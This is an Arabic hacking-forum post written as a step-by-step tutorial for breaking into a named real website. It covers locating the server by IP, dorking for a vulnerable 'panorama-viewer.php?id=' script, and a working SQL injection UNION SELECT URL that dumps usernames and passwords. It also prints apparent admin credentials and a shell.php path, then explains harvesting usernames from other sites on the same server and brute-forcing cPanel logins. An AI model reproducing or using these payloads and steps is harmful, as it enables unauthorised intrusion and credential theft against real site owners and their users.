:: vBspiders Professional Network :: - حصريا : استهداف موقع و اكتشاف ثغرات ثم استخراج السيرفر و المواقع التابعة و استهدافها و استخراج اليوزرات و التخمين علي السي بانل

http://forum.fathinet.com/_test/bismi_allah_salam.gif

الدرس الاول استهداف الموقع و استخراج السيرفر

كود PHP:


		
			
http://mckitchens.com/

الموقع المستهدف نستخرج السيرفر من عدة مواقع منها

كود PHP:


		
			
www.whois.net/

www.raynette.fr/services/whois/

whois.domaintools.com/ 

www.whois.sc/

نستعمل موقع هذا احسن لنخرج السيرفر

كود PHP:


		
			
news.netcraft.com/

نكتب الموقع علي الشكل التالي

كود PHP:


		
			
mckitchens.com

ثم نظغط علي raport

السيرفر هو

كود PHP:


		
			
IP address    209.234.251.93    Site rank    201

Country     US    Nameserver    ns1.drudgereport.com

Date first seen    April 1997    DNS admin    __hostmaster@drudgereport.com

Domain Registrar    networksolutions.com    Reverse DNS    unknown

Organisation    Drudge, Matt, PO Box 459ATTN DRUDGEREPORT.COM, care of Network Solutions, Drums, Panama    Nameserver Organisation    Drudge, Matt, PO Box 459ATTN DRUDGEREPORT.COM, care of Network Solutions, Drums, Panama

كود PHP:


		
			
 209.234.251.93

الدرس الثاني اكتشاف الثغرات في الموقع

اول شي نروح لل

كود PHP:


		
			
Bing.com

نكتب كما موجود للبحث عن الثغرات مع اني كنت اتصفح فلموقع فلقيت سكريبت

كود PHP:


		
			
panorama-viewer.php?id=

يعني سنبحث عن ثغرات SQL injection

نكتب شبه دورك

كود PHP:


		
			
inurl:"panorama-viewer.php?id="

سنجد كثير مواقع منها موقعنا اي يعني انه مصاب اوكي عملنا كل شي الا الاستغلال

روح لموقع ثغرات نكتب

كود PHP:


		
			
exploit-db.com

كود PHP:


		
			
chercher : inurl:"panorama-viewer.php?id="

يعني طلعتلنا الثغرة :tears:

الدرس الثالث اختراق الموقع

اوكي الدورك هنا

كود PHP:


		
			
Google search: inurl:panorama-viewer.php?id=

الاستغلال

كود PHP:


		
			
http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--





[-] http://server/adm/users.php



[-] http://server/adm/panorama_edit.php?id=1



[-] http://server/listimages/shell.php

الموقع المستهدف

كود PHP:


		
			
http://mckitchens.com/panorama-viewer.php?id=1

تم الاختراق

كود PHP:


		
			
http://mckitchens.com/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--

معلومات الادمين

كود PHP:


		
			
JOHNZ3CABN:MCKMIS89A3F,GINNYUZ3R:*P255W0RD407

الدرس الرابع استخراج مواقع السيرفر

كود PHP:


		
			
http://www.yougetsignal.com/tools/web-sites-on-web-server/

الموقع يخرج مواقع السيرفر و انت طبق عليهم الثفرة
ثم نفتح الnotepad

نضع المواقع و نحذف منها com net org etc

نسجل الملف تيكست نصي ونفتحه بالmicrosoft accés

نضع الموشر في الثمانين

مبروك عليك اليوزرات :msn-wink::msn-wink: ثم خمن علي السي بانل لوول

تحياتي لكم يا عناكب

http://3.bp.blogspot.com/_pk70F9Mktc...g/s320/bye.gif